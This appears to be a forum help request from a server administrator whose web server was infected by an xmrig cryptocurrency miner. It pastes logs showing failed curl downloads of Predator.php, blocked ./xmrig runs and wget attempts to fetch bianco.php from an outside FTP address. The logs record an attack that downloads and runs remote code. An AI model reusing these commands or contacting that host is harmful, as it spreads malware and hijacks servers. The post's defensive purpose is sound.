I noticed that someone is manage to put a mining virus xmine on my server.
That was mining for fev days until I noticed that processor is up to 90%, I have deleted that virus and enabled SElinux.
Now today I see virus again in cache folder of web page but not running.
How to prevent uploading viruses in cache folder of web page.
I found out this in my log files
sh: line 0: cd: HOME not set
sh: a.jpg.jpg: command not found
sh: line 0: cd: HOME not set
sh: a.jpg: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Warning: Failed to create the file Predator.php: Permission denied
4 43704 4 1927 0 0 4323 0 0:00:10 --:--:-- 0:00:10 4330
curl: (23) Failed writing body (0 != 1927)
sh: a.jpg.jpg: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Warning: Failed to create the file Predator.php: Permission denied
4 43704 4 1930 0 0 8711 0 0:00:05 --:--:-- 0:00:05 8693
curl: (23) Failed writing body (0 != 1930)
sh: a.jpg: command not found
sh: a.jpg.jpg: command not found
sh: a.jpg: command not found
sh: a.jpg.jpg: command not found
sh: a.jpg: command not found
sh: a.jpg.mp4: command not found
sh: a.jpg: command not found
sh: ./xmrig: Permission denied
sh: ./xmrig: Permission denied
--2017-10-10 04:12:41-- ftp://14.162.143.195/bianco.php
=> 'bianco.php'
Connecting to 14.162.143.195:21... failed: Permission denied.
Retrying.
--2017-10-10 04:12:42-- ftp://14.162.143.195/bianco.php
(try: 2) => 'bianco.php'
Connecting to 14.162.143.195:21... failed: Permission denied.
Retrying.